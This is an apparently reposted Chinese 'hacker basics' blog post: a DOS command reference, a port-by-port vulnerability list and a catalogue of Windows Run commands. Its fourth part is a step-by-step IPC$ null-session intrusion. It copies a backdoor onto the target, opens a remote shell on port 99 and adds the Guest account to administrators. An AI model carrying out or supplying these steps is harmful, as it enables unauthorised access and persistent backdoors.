<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    JAVA流通橋

    JAVA啟發者

    統計

    留言簿(3)

    AJAX相關網址

    Eclipse相關網址

    Hibernate

    java相關網址

    LINUX相關網址

    webwork相關網址

    友好鏈接

    閱讀排行榜

    評論排行榜

    黑客高手必懂基礎內容

    轉貼:黑客高手必懂基礎內容 (發在這里只為娛樂大家)

    本帖被 nathena 執行加亮操作(2007-06-14)
    黑客高手必懂基礎內容

    第一部分:DOS命令大全
    第二部分:TCP端口:作用,漏洞,操作詳析
    第三部分:開始→運行→命令 集錦
    第四部分:IPC$空連接的入侵和防御詳解
    第五部分:GOOGLE搜索秘籍
    第六部分:21種RING的提權方法
    第七部分:菜鳥+Sa+注入工具組合=肉雞成群
    第一部分、DOS 常用命令:

    dir 列文件名     deltree 刪除目錄樹     cls 清屏       cd 改變當前目錄
    copy 拷貝文件     diskcopy 復制磁盤       del 刪除文件     format 格式化磁盤
    edit 文本編輯     mem 查看內存狀況       md 建立子目錄     move 移動文件、改目錄名
    more 分屏顯示     type 顯示文件內容       rd 刪除目錄     sys 制作DOS系統盤
    ren 改變文件名   xcopy 拷貝目錄與文件     chkdsk 檢查磁盤   attrib 設置文件屬性
    fdisk 硬盤分區   date 顯示及修改日期     label 設置卷標號   defrag 磁盤碎片整理
    msd 系統檢測     path 設置搜尋目錄       share 文件共享   memmaker內存優化管理
    help 幫助       restore 恢復備份文件     set 設置環境變量   time 顯示及修改時間
    tree 列目錄樹     debug 隨機調試程序     doskey 重新調用DOS命令                                                                                             prempt 設置提示符 undelete恢復被刪的文件   scandisk檢測、修理磁盤      
     
    不常用DOS命令
    diskcomp磁盤比較          append 設置非執行文件路徑
    expand 還原DOS文件         fasthelp快速顯示幫助信息
    fc 文件比較             interink啟動服務器
    setver 設置版本           intersvr啟動客戶機
    subst 路徑替換           qbasic Basic集成環境
    vsafe 防病毒             unformat恢復已格式化的磁盤
    ver 顯示DOS版本號         smartdrv設置磁盤加速器
    vol 顯示磁盤卷標號         lh 將程序裝入高端內存  
    ctty 改變控制設備         emm386 擴展內存管理
    常用命令具體介紹:  

    一、Dir

    顯示目錄文件和子目錄列表,呵呵,這個當然是人人要知道的。
    可以使用通配符(? 和 *),?表通配一個字符,*表通配任意字符
    *.后綴
    指定要查看后綴的文件。 上面其實也可以為“ . 后綴”,例如dir *.exe 等于dir .exe
    /p
    每次顯示一個列表屏幕。要查看下一屏,請按鍵盤上的任意鍵。
    /w
    以寬格式顯示列表,在每一行上最多顯示 5 個文件名或目錄名。
    /s
    列出指定目錄及所有子目錄中出現的每個指定的文件名。比win環境下的查找快多了
    dir *.* -> a.txt 把當前目錄文件列表寫入a.txt
    dir *.* /s -> a.txt 把當前目錄文件列表寫入a.txt,包括子目錄下文件。

    二、Attrib

    顯示、設置或刪除指派給文件或目錄的只讀、存檔、系統以及隱藏屬性。如果在不含參數的情況下使用,則 attrib 會顯示當前目錄中所有文件的屬性。
    +r
    設置只讀屬性。
    -r
    清除只讀屬性。
    +a
    設置存檔文件屬性。
    -a
    清除存檔文件屬性。
    +s
    設置系統屬性。
    -s
    清除系統屬性。
    +h
    設置隱藏屬性。
    -h
    清除隱藏屬性。


    三、Cls

    清除顯示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”

    四、Exit
    退出當前命令解釋程序并返回到系統。

    五、format
    格式化
    /q
    執行快速格式化。刪除以前已格式化卷的文件表和根目錄,但不在扇區之間掃描損壞區域。使用 /q 命令行選項應該僅格式化以前已格式化的完好的卷。

    六、Ipconfig
    顯示所有當前的 TCP/IP 網絡配置值、刷新動態主機配置協議 (DHCP) 和域名系統 (DNS) 設置。使用不帶參數的 ipconfig 可以顯示所有適配器的 IP 地址、子網掩碼、默認網關。
    /all
    顯示所有適配器的完整 TCP/IP 配置信息。
    ipconfig 等價于 winipcfg,后者在ME、98 和 95 上可用。盡管 Windows XP 沒有提供象 winipcfg 命令一樣的圖形化界面,但可以使用“網絡連接”查看和更新 IP 地址。要做到這一點,請打開 網絡連接,右鍵單擊某一網絡連接,單擊“狀態”,然后單擊“支持”選項卡。
    該命令最適用于配置為自動獲取 IP 地址的計算機。它使用戶可以確定哪些 TCP/IP 配置值是由 DHCP、自動專用 IP 地址 (APIPA) 和其他配置配置的。

    七、md
    創建目錄或子目錄

    八、Move
    將一個或多個文件從一個目錄移動到指定的目錄。

    九、Nbtstat
    顯示本地計算機和遠程計算機的基于 TCP/IP (NetBT) 協議的 NetBIOS 統計資料、NetBIOS 名稱表和 NetBIOS 名稱緩存。Nbtstat 可以刷新 NetBIOS 名稱緩存和注冊的 Windows Internet 名稱服務 (WINS) 名稱。使用不帶參數的 nbtstat 顯示幫助。Nbtstat 命令行參數區分大小寫。
    -a remotename
    顯示遠程計算機的 NetBIOS 名稱表,其中,RemoteName 是遠程計算機的 NetBIOS 計算機名稱。
    -A IPAddress
    顯示遠程計算機的 NetBIOS 名稱表,其名稱由遠程計算機的 IP 地址指定(以小數點分隔)。

    十、Netstat
    顯示活動的 TCP 連接、計算機偵聽的端口、以太網統計信息、IP 路由表、IPv4 統計信息(對于 IP、ICMP、TCP 和 UDP 協議)以及 IPv6 統計信息(對于 IPv6、ICMPv6、通過 IPv6 的 TCP 以及通過 IPv6 的 UDP 協議)。使用時如果不帶參數,netstat 顯示活動的 TCP 連接。
    -a
    顯示所有活動的 TCP 連接以及計算機偵聽的 TCP 和 UDP 端口。
    十一、Ping
    通過發送“網際消息控制協議 (ICMP)”回響請求消息來驗證與另一臺 TCP/IP 計算機的 IP 級連接?;仨憫鹣⒌慕邮涨闆r將和往返過程的次數一起顯示出來。Ping 是用于檢測網絡連接性、可到達性和名稱解析的疑難問題的主要 TCP/IP 命令。如果不帶參數,ping 將顯示幫助。名稱和Ip地址解析是它的最簡單應用也是用的最多的。
    -t
    指定在中斷前 ping 可以持續發送回響請求信息到目的地。要中斷并顯示統計信息,請按 CTRL-BREAK。要中斷并退出 ping,請按 CTRL-C。
    -lSize
    指定發送的回響請求消息中“數據”字段的長度(以字節表示)。默認值為 32。size 的最大值是 65,527。

    十二、Rename (Ren)
    更改文件的名稱。
    例如 ren *.abc *.cba

    十三、Set
    顯示、設置或刪除環境變量。如果沒有任何參數,set 命令將顯示當前環境設置。

    十四、Shutdown
    允許您關閉或重新啟動本地或遠程計算機。如果沒有使用參數,shutdown 將注銷當前用戶。
    -m ComputerName
    指定要關閉的計算機。
    -t xx
    將用于系統關閉的定時器設置為 xx 秒。默認值是 20 秒。
    -l
    注銷當前用戶,這是默認設置。-m ComputerName 優先。
    -s
    關閉本地計算機。
    -r
    關閉之后重新啟動。
    -a
    中止關閉。除了 -l 和 ComputerName 外,系統將忽略其它參數。在超時期間,您只可以使用 -a。

    十五、System File Checker (sfc)
    win下才有,在重新啟動計算機后掃描和驗證所有受保護的系統文件。
    /scannow
    立即掃描所有受保護的系統文件。
    /scanonce
    一次掃描所有受保護的系統文件。
    /purgecache
    立即清除“Windows 文件保護”文件高速緩存,并掃描所有受保護的系統文件。
    /cachesize=x
    設置“Windows 文件保護”文件高速緩存的大小,以 MB 為單位。

    十六、type
    顯示文本文件的內容。使用 type 命令查看文本文件或者是bat文件而不修改文件

    十七、Tree
    圖像化顯示路徑或驅動器中磁盤的目錄結構。

    十八、Xcopy
    復制文件和目錄,包括子目錄。
    /s
    復制非空的目錄和子目錄。如果省略 /s,xcopy 將在一個目錄中工作。
    /e
    復制所有子目錄,包括空目錄。

    十九、copy
    將一個或多個文件從一個位置復制到其他位置

    二十、del
    刪除指定文件。
    ftp和bat批命令和net和telnet由于子命令太多,這里不說了,不過這幾個都是常用到的。

    第二部分、
    TCP端口:作用,漏洞,操作詳析

    在上網的時候,我們經常會看到“端口”這個詞,也會經常用到端口號,比如在FTP地址后面增加的“21”,21就表示端口號。那么端口到底是什么意思呢?怎樣查看端口號呢?一個端口是否成為網絡惡意攻擊的大門呢?,我們應該如何面對形形色色的端口呢?下面就將介紹這方面的內容,以供大家參考。
      21端口:21端口主要用于FTP(File Transfer Protocol,文件傳輸協議)服務。

      端口說明:21端口主要用于FTP(File Transfer Protocol,文件傳輸協議)服務,FTP服務主要是為了在兩臺計算機之間實現文件的上傳與下載,一臺計算機作為FTP客戶端,另一臺計算機作為FTP服務器,可以采用匿名(anonymous)登錄和授權用戶名與密碼登錄兩種方式登錄FTP服務器。目前,通過FTP服務來實現文件的傳輸是互聯網上上傳、下載文件最主要的方法。另外,還有一個20端口是用于FTP數據傳輸的默認端口號。

      在Windows中可以通過Internet信息服務(IIS)來提供FTP連接和管理,也可以單獨安裝FTP服務器軟件來實現FTP功能,比如常見的FTP Serv-U。

      操作建議:因為有的FTP服務器可以通過匿名登錄,所以常常會被黑客利用。另外,21端口還會被一些木馬利用,比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。如果不架設FTP服務器,建議關閉21端口。 23端口:23端口主要用于Telnet(遠程登錄)服務,是Internet上普遍采用的登錄和仿真程序。

      端口說明:23端口主要用于Telnet(遠程登錄)服務,是Internet上普遍采用的登錄和仿真程序。同樣需要設置客戶端和服務器端,開啟Telnet服務的客戶端就可以登錄遠程Telnet服務器,采用授權用戶名和密碼登錄。登錄之后,允許用戶使用命令提示符窗口進行相應的操作。在Windows中可以在命令提示符窗口中,鍵入“Telnet”命令來使用Telnet遠程登錄。

      操作建議:利用Telnet服務,黑客可以搜索遠程登錄Unix的服務,掃描操作系統的類型。而且在Windows 2000中Telnet服務存在多個嚴重的漏洞,比如提升權限、拒絕服務等,可以讓遠程服務器崩潰。Telnet服務的23端口也是TTS(Tiny Telnet Server)木馬的缺省端口。所以,建議關閉23端口。

      25端口:25端口為SMTP(Simple Mail Transfer Protocol,簡單郵件傳輸協議)服務器所開放,主要用于發送郵件,如今絕大多數郵件服務器都使用該協議。

      端口說明:25端口為SMTP(Simple Mail Transfer Protocol,簡單郵件傳輸協議)服務器所開放,主要用于發送郵件,如今絕大多數郵件服務器都使用該協議。比如我們在使用電子郵件客戶端程序的時候,在創建賬戶時會要求輸入SMTP服務器地址,該服務器地址默認情況下使用的就是25端口。

      端口漏洞:

      1. 利用25端口,黑客可以尋找SMTP服務器,用來轉發垃圾郵件。

      2. 25端口被很多木馬程序所開放,比如Ajan、Antigen、Email Password Sender、ProMail、trojan、Tapiras、Terminator、WinPC、WinSpy等等。拿WinSpy來說,通過開放25端口,可以監視計算機正在運行的所有窗口和模塊。

      操作建議:如果不是要架設SMTP郵件服務器,可以將該端口關閉。

    53端口:53端口為DNS(Domain Name Server,域名服務器)服務器所開放,主要用于域名解析,DNS服務在NT系統中使用的最為廣泛。


      端口說明:53端口為DNS(Domain Name Server,域名服務器)服務器所開放,主要用于域名解析,DNS服務在NT系統中使用的最為廣泛。通過DNS服務器可以實現域名與IP地址之間的轉換,只要記住域名就可以快速訪問網站。

      端口漏洞:如果開放DNS服務,黑客可以通過分析DNS服務器而直接獲取Web服務器等主機的IP地址,再利用53端口突破某些不穩定的防火墻,從而實施攻擊。近日,美國一家公司也公布了10個最易遭黑客攻擊的漏洞,其中第一位的就是DNS服務器的BIND漏洞。

      操作建議:如果當前的計算機不是用于提供域名解析服務,建議關閉該端口。

      67、68端口:67、68端口分別是為Bootp服務的Bootstrap Protocol Server(引導程序協議服務端)和Bootstrap Protocol Client(引導程序協議客戶端)開放的端口。

      端口說明:67、68端口分別是為Bootp服務的Bootstrap Protocol Server(引導程序協議服務端)和Bootstrap Protocol Client(引導程序協議客戶端)開放的端口。Bootp服務是一種產生于早期Unix的遠程啟動協議,我們現在經常用到的DHCP服務就是從Bootp服務擴展而來的。通過Bootp服務可以為局域網中的計算機動態分配IP地址,而不需要每個用戶去設置靜態IP地址。

      端口漏洞:如果開放Bootp服務,常常會被黑客利用分配的一個IP地址作為局部路由器通過“中間人”(man-in-middle)方式進行攻擊。

      操作建議:建議關閉該端口。

      69端口:TFTP是Cisco公司開發的一個簡單文件傳輸協議,類似于FTP。

      端口說明:69端口是為TFTP(Trival File Tranfer Protocol,次要文件傳輸協議)服務開放的,TFTP是Cisco公司開發的一個簡單文件傳輸協議,類似于FTP。不過與FTP相比,TFTP不具有復雜的交互存取接口和認證控制,該服務適用于不需要復雜交換環境的客戶端和服務器之間進行數據傳輸。

      端口漏洞:很多服務器和Bootp服務一起提供TFTP服務,主要用于從系統下載啟動代碼??墒?,因為TFTP服務可以在系統中寫入文件,而且黑客還可以利用TFTP的錯誤配置來從系統獲取任何文件。

      操作建議:建議關閉該端口。

      79端口:79端口是為Finger服務開放的,主要用于查詢遠程主機在線用戶、操作系統類型以及是否緩沖區溢出等用戶的詳細信息。

      端口說明:79端口是為Finger服務開放的,主要用于查詢遠程主機在線用戶、操作系統類型以及是否緩沖區溢出等用戶的詳細信息。比如要顯示遠程計算機www.abc.com上的user01用戶的信息,可以在命令行中鍵入“finger user01@www.abc.com”即可。

      端口漏洞:一般黑客要攻擊對方的計算機,都是通過相應的端口掃描工具來獲得相關信息,比如使用“流光”就可以利用79端口來掃描遠程計算機操作系統版本,獲得用戶信息,還能探測已知的緩沖區溢出錯誤。這樣,就容易遭遇到黑客的攻擊。而且,79端口還被Firehotcker木馬作為默認的端口。

      操作建議:建議關閉該端口。

      80端口:80端口是為HTTP(HyperText Transport Protocol,超文本傳輸協議)開放的,這是上網沖浪使用最多的協議,主要用于在WWW(World Wide Web,萬維網)服務上傳輸信息的協議。

      端口說明:80端口是為HTTP(HyperText Transport Protocol,超文本傳輸協議)開放的,這是上網沖浪使用最多的協議,主要用于在WWW(World Wide Web,萬維網)服務上傳輸信息的協議。我們可以通過HTTP地址加“:80”(即常說的“網址”)來訪問網站的,比如http://www.cce.com.cn:80,因為瀏覽網頁服務默認的端口號是80,所以只要輸入網址,不用輸入“:80”。

      端口漏洞:有些木馬程序可以利用80端口來攻擊計算機的,比如Executor、RingZero等。

      操作建議:為了能正常上網沖浪,我們必須開啟80端口。

    99端口:99端口是用于一個名為“Metagram Relay”(亞對策延時)的服務,該服務比較少見,一般是用不到的。


      端口說明:99端口是用于一個名為“Metagram Relay”(亞對策延時)的服務,該服務比較少見,一般是用不到的。

      端口漏洞:雖然“Metagram Relay”服務不常用,可是Hidden Port、NCx99等木馬程序會利用該端口,比如在Windows 2000中,NCx99可以把cmd.exe程序綁定到99端口,這樣用Telnet就可以連接到服務器,隨意添加用戶、更改權限。

      操作建議:建議關閉該端口。

      109、110端口:109端口是為POP2(Post Office Protocol Version 2,郵局協議2)服務開放的,110端口是為POP3(郵件協議3)服務開放的,POP2、POP3都是主要用于接收郵件的。

      端口說明:109端口是為POP2(Post Office Protocol Version 2,郵局協議2)服務開放的,110端口是為POP3(郵件協議3)服務開放的,POP2、POP3都是主要用于接收郵件的,目前POP3使用的比較多,許多服務器都同時支持POP2和POP3??蛻舳丝梢允褂肞OP3協議來訪問服務端的郵件服務,如今ISP的絕大多數郵件服務器都是使用該協議。在使用電子郵件客戶端程序的時候,會要求輸入POP3服務器地址,默認情況下使用的就是110端口。

      端口漏洞:POP2、POP3在提供郵件接收服務的同時,也出現了不少的漏洞。單單POP3服務在用戶名和密碼交換緩沖區溢出的漏洞就不少于20個,比如WebEasyMail POP3 Server合法用戶名信息泄露漏洞,通過該漏洞遠程攻擊者可以驗證用戶賬戶的存在。另外,110端口也被ProMail trojan等木馬程序所利用,通過110端口可以竊取POP賬號用戶名和密碼。

      操作建議:如果是執行郵件服務器,可以打開該端口。

      111端口:111端口是SUN公司的RPC(Remote Procedure Call,遠程過程調用)服務所開放的端口,主要用于分布式系統中不同計算機的內部進程通信,RPC在多種網絡服務中都是很重要的組件。

      端口說明:111端口是SUN公司的RPC(Remote Procedure Call,遠程過程調用)服務所開放的端口,主要用于分布式系統中不同計算機的內部進程通信,RPC在多種網絡服務中都是很重要的組件。常見的RPC服務有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等等。在Microsoft的Windows中,同樣也有RPC服務。

      端口漏洞:SUN RPC有一個比較大漏洞,就是在多個RPC服務時xdr_array函數存在遠程緩沖溢出漏洞,通過該漏洞允許攻擊者傳遞超

      113端口:113端口主要用于Windows的“Authentication Service”(驗證服務)。

      端口說明:113端口主要用于Windows的“Authentication Service”(驗證服務),一般與網絡連接的計算機都運行該服務,主要用于驗證TCP連接的用戶,通過該服務可以獲得連接計算機的信息。在Windows 2000/2003 Server中,還有專門的IAS組件,通過該組件可以方便遠程訪問中進行身份驗證以及策略管理。

      端口漏洞:113端口雖然可以方便身份驗證,但是也常常被作為FTP、POP、SMTP、IMAP以及IRC等網絡服務的記錄器,這樣會被相應的木馬程序所利用,比如基于IRC聊天室控制的木馬。另外,113端口還是Invisible Identd Deamon、Kazimas等木馬默認開放的端口。

      操作建議:建議關閉該端口。

      119端口:119端口是為“Network News Transfer Protocol”(網絡新聞組傳輸協議,簡稱NNTP)開放的。

      端口說明:119端口是為“Network News Transfer Protocol”(網絡新聞組傳輸協議,簡稱NNTP)開放的,主要用于新聞組的傳輸,當查找USENET服務器的時候會使用該端口。

      端口漏洞:著名的Happy99蠕蟲病毒默認開放的就是119端口,如果中了該病毒會不斷發送電子郵件進行傳播,并造成網絡的堵塞。

      操作建議:如果是經常使用USENET新聞組,就要注意不定期關閉該端口。 135端口:135端口主要用于使用RPC(Remote Procedure Call,遠程過程調用)協議并提供DCOM(分布式組件對象模型)服務。


      端口說明:135端口主要用于使用RPC(Remote Procedure Call,遠程過程調用)協議并提供DCOM(分布式組件對象模型)服務,通過RPC可以保證在一臺計算機上運行的程序可以順利地執行遠程計算機上的代碼;使用DCOM可以通過網絡直接進行通信,能夠跨包括HTTP協議在內的多種網絡傳輸。

      端口漏洞:相信去年很多Windows 2000和Windows XP用戶都中了“沖擊波”病毒,該病毒就是利用RPC漏洞來攻擊計算機的。RPC本身在處理通過TCP/IP的消息交換部分有一個漏洞,該漏洞是由于錯誤地處理格式不正確的消息造成的。該漏洞會影響到RPC與DCOM之間的一個接口,該接口偵聽的端口就是135。

      操作建議:為了避免“沖擊波”病毒的攻擊,建議關閉該端口。

      137端口:137端口主要用于“NetBIOS Name Service”(NetBIOS名稱服務)。

      端口說明:137端口主要用于“NetBIOS Name Service”(NetBIOS名稱服務),屬于UDP端口,使用者只需要向局域網或互聯網上的某臺計算機的137端口發送一個請求,就可以獲取該計算機的名稱、注冊用戶名,以及是否安裝主域控制器、IIS是否正在運行等信息。

      端口漏洞:因為是UDP端口,對于攻擊者來說,通過發送請求很容易就獲取目標計算機的相關信息,有些信息是直接可以被利用,并分析漏洞的,比如IIS服務。另外,通過捕獲正在利用137端口進行通信的信息包,還可能得到目標計算機的啟動和關閉的時間,這樣就可以利用專門的工具來攻擊。

      操作建議:建議關閉該端口。

      139端口:139端口是為“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印機共享以及Unix中的Samba服務。

      端口說明:139端口是為“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印機共享以及Unix中的Samba服務。在Windows中要在局域網中進行文件的共享,必須使用該服務。比如在Windows 98中,可以打開“控制面板”,雙擊“網絡”圖標,在“配置”選項卡中單擊“文件及打印共享”按鈕選中相應的設置就可以安裝啟用該服務;在Windows 2000/XP中,可以打開“控制面板”,雙擊“網絡連接”圖標,打開本地連接屬性;接著,在屬性窗口的“常規”選項卡中選擇“Internet協議(TCP/IP)”,單擊“屬性”按鈕;然后在打開的窗口中,單擊“高級”按鈕;在“高級TCP/IP設置”窗口中選擇“WINS”選項卡,在“NetBIOS設置”區域中啟用TCP/IP上的NetBIOS。

      端口漏洞:開啟139端口雖然可以提供共享服務,但是常常被攻擊者所利用進行攻擊,比如使用流光、SuperScan等端口掃描工具,可以掃描目標計算機的139端口,如果發現有漏洞,可以試圖獲取用戶名和密碼,這是非常危險的。

      操作建議:如果不需要提供文件和打印機共享,建議關閉該端口。

      143端口:143端口主要是用于“Internet Message Access Protocol”v2(Internet消息訪問協議,簡稱IMAP)。

      端口說明:143端口主要是用于“Internet Message Access Protocol”v2(Internet消息訪問協議,簡稱IMAP),和POP3一樣,是用于電子郵件的接收的協議。通過IMAP協議我們可以在不接收郵件的情況下,知道信件的內容,方便管理服務器中的電子郵件。不過,相對于POP3協議要負責一些。如今,大部分主流的電子郵件客戶端軟件都支持該協議。

      端口漏洞:同POP3協議的110端口一樣,IMAP使用的143端口也存在緩沖區溢出漏洞,通過該漏洞可以獲取用戶名和密碼。另外,還有一種名為“admv0rm”的Linux蠕蟲病毒會利用該端口進行繁殖。

      操作建議:如果不是使用IMAP服務器操作,應該將該端口關閉。

      161端口:161端口是用于“Simple Network Management Protocol”(簡單網絡管理協議,簡稱SNMP)。

      端口說明:161端口是用于“Simple Network Management Protocol”(簡單網絡管理協議,簡稱SNMP),該協議主要用于管理TCP/IP網絡中的網絡協議,在Windows中通過SNMP服務可以提供關于TCP/IP網絡上主機以及各種網絡設備的狀態信息。目前,幾乎所有的網絡設備廠商都實現對SNMP的支持。

      在Windows 2000/XP中要安裝SNMP服務,我們首先可以打開“Windows組件向導”,在“組件”中選擇“管理和監視工具”,單擊“詳細信息”按鈕就可以看到“簡單網絡管理協議(SNMP)”,選中該組件;然后,單擊“下一步”就可以進行安裝。

      端口漏洞:因為通過SNMP可以獲得網絡中各種設備的狀態信息,還能用于對網絡設備的控制,所以黑客可以通過SNMP漏洞來完全控制網絡。

      操作建議:建議關閉該端口443端口:443端口即網頁瀏覽端口,主要是用于HTTPS服務,是提供加密和通過安全端口傳輸的另一種HTTP。


      端口說明:443端口即網頁瀏覽端口,主要是用于HTTPS服務,是提供加密和通過安全端口傳輸的另一種HTTP。在一些對安全性要求較高的網站,比如銀行、證券、購物等,都采用HTTPS服務,這樣在這些網站上的交換信息其他人都無法看到,保證了交易的安全性。網頁的地址以https://開始,而不是常見的http://。

      端口漏洞:HTTPS服務一般是通過SSL(安全套接字層)來保證安全性的,但是SSL漏洞可能會受到黑客的攻擊,比如可以黑掉在線銀行系統,盜取信用卡賬號等。

      操作建議:建議開啟該端口,用于安全性網頁的訪問。另外,為了防止黑客的攻擊,應該及時安裝微軟針對SSL漏洞發布的最新安全補丁。

      554端口:554端口默認情況下用于“Real Time Streaming Protocol”(實時流協議,簡稱RTSP)。

      端口說明:554端口默認情況下用于“Real Time Streaming Protocol”(實時流協議,簡稱RTSP),該協議是由RealNetworks和Netscape共同提出的,通過RTSP協議可以借助于Internet將流媒體文件傳送到RealPlayer中播放,并能有效地、最大限度地利用有限的網絡帶寬,傳輸的流媒體文件一般是Real服務器發布的,包括有.rm、.ram。如今,很多的下載軟件都支持RTSP協議,比如FlashGet、影音傳送帶等等。

      端口漏洞:目前,RTSP協議所發現的漏洞主要就是RealNetworks早期發布的Helix Universal Server存在緩沖區溢出漏洞,相對來說,使用的554端口是安全的。

      操作建議:為了能欣賞并下載到RTSP協議的流媒體文件,建議開啟554端口。

      1024端口:1024端口一般不固定分配給某個服務,在英文中的解釋是“Reserved”(保留)。

      端口說明:1024端口一般不固定分配給某個服務,在英文中的解釋是“Reserved”(保留)。之前,我們曾經提到過動態端口的范圍是從1024~65535,而1024正是動態端口的開始。該端口一般分配給第一個向系統發出申請的服務,在關閉服務的時候,就會釋放1024端口,等待其他服務的調用。

      端口漏洞:著名的YAI木馬病毒默認使用的就是1024端口,通過該木馬可以遠程控制目標計算機,獲取計算機的屏幕圖像、記錄鍵盤事件、獲取密碼等,后果是比較嚴重的。

      操作建議:一般的殺毒軟件都可以方便地進行YAI病毒的查殺,所以在確認無YAI病毒的情況下建議開啟該端口。

    第三部分、
    開始→運行→命令 集錦
    winver---------檢查Windows版本
    wmimgmt.msc----打開windows管理體系結構(WMI)
    wupdmgr--------windows更新程序
    wscript--------windows腳本宿主設置
    write----------寫字板
    winmsd---------系統信息
    wiaacmgr-------掃描儀和照相機向導
    winchat--------XP自帶局域網聊天

    mem.exe--------顯示內存使用情況
    Msconfig.exe---系統配置實用程序
    mplayer2-------簡易widnows media player
    mspaint--------畫圖板
    mstsc----------遠程桌面連接
    mplayer2-------媒體播放機
    magnify--------放大鏡實用程序
    mmc------------打開控制臺
    mobsync--------同步命令

    dxdiag---------檢查DirectX信息
    drwtsn32------ 系統醫生
    devmgmt.msc--- 設備管理器
    dfrg.msc-------磁盤碎片整理程序
    diskmgmt.msc---磁盤管理實用程序
    dcomcnfg-------打開系統組件服務
    ddeshare-------打開DDE共享設置
    dvdplay--------DVD播放器

    net stop messenger-----停止信使服務
    net start messenger----開始信使服務
    notepad--------打開記事本
    nslookup-------網絡管理的工具向導
    ntbackup-------系統備份和還原
    narrator-------屏幕“講述人”
    ntmsmgr.msc----移動存儲管理器
    ntmsoprq.msc---移動存儲管理員操作請求
    netstat -an----(TC)命令檢查接口

    syncapp--------創建一個公文包
    sysedit--------系統配置編輯器
    sigverif-------文件簽名驗證程序
    sndrec32-------錄音機
    shrpubw--------創建共享文件夾
    secpol.msc-----本地安全策略
    syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
    services.msc---本地服務設置
    Sndvol32-------音量控制程序
    sfc.exe--------系統文件檢查器
    sfc /scannow---windows文件保護

    tsshutdn-------60秒倒計時關機命令
    tourstart------xp簡介(安裝完成后出現的漫游xp程序)
    taskmgr--------任務管理器

    eventvwr-------事件查看器
    eudcedit-------造字程序
    explorer-------打開資源管理器


    packager-------對象包裝程序
    perfmon.msc----計算機性能監測程序
    progman--------程序管理器

    regedit.exe----注冊表
    rsop.msc-------組策略結果集
    regedt32-------注冊表編輯器
    rononce -p ----15秒關機
    regsvr32 /u *.dll----停止dll文件運行
    regsvr32 /u zipfldr.dll------取消ZIP支持

    cmd.exe--------CMD命令提示符
    chkdsk.exe-----Chkdsk磁盤檢查
    certmgr.msc----證書管理實用程序
    calc-----------啟動計算器
    charmap--------啟動字符映射表
    cliconfg-------SQL SERVER 客戶端網絡實用程序
    Clipbrd--------剪貼板查看器
    conf-----------啟動netmeeting
    compmgmt.msc---計算機管理
    cleanmgr-------整理
    ciadv.msc------索引服務程序

    osk------------打開屏幕鍵盤
    odbcad32-------ODBC數據源管理器
    oobe/msoobe /a----檢查XP是否激活
    lusrmgr.msc----本機用戶和組
    logoff---------注銷命令

    iexpress-------自帶的壓縮包的制作軟件
    IEXPRESS 是 Windows 中自帶的 CAB 格式壓縮包的制作軟件,從 Windows 2000就有了,但是它一直都藏
    在 Windows 的系統,在微軟的許多產品介紹中似乎也看不見它的蹤跡,IEXPRESS 不僅支持 CAB 文件的打包
    制作并且支持高級 INF 格式安裝

    Nslookup-------IP地址偵測器

    fsmgmt.msc-----共享文件夾管理器

    utilman--------輔助工具管理器

    gpedit.msc-----組策略

    第四部分
    IPC$空連接的入侵和防御詳解

    相關命令
      建立空連接
        net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
      建立非空連接
        net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
      映射默認共享
        net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
      如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
      刪除一個ipc$連接
        net use \\IP\ipc$ /del
      刪除共享映射
        net use c: /del 刪除映射的c盤,其他盤類推
        net use * /del 刪除全部,會有提示要求按y確認
    經典入侵模式
      1.C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
      這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
      2. C:\>copy srv.exe \\127.0.0.1\admin$
      先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。
      3.C:\>net time \\127.0.0.1
      查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
      4.C:\>at \\127.0.0.1 11:05 srv.exe
      用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵?。?
      5.C:\>net time \\127.0.0.1
      再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。
      6.C:\>telnet 127.0.0.1 99
      這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
      雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
      7.C:\>copy ntlm.exe \\127.0.0.1\admin$
      用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
      8.C:\WINNT\system32>ntlm
      輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務!
      9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)
      為了以防萬一,我們再把guest激活加到管理組
      10.C:\>net user guest /active:yes
      將對方的Guest用戶激活
      11.C:\>net user guest 1234
      將Guest的密碼改為1234,或者你要設定的密碼
      12.C:\>net localgroup administrators guest /add
      將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機)
    ipc$與空連接,139,445端口,默認共享的關系
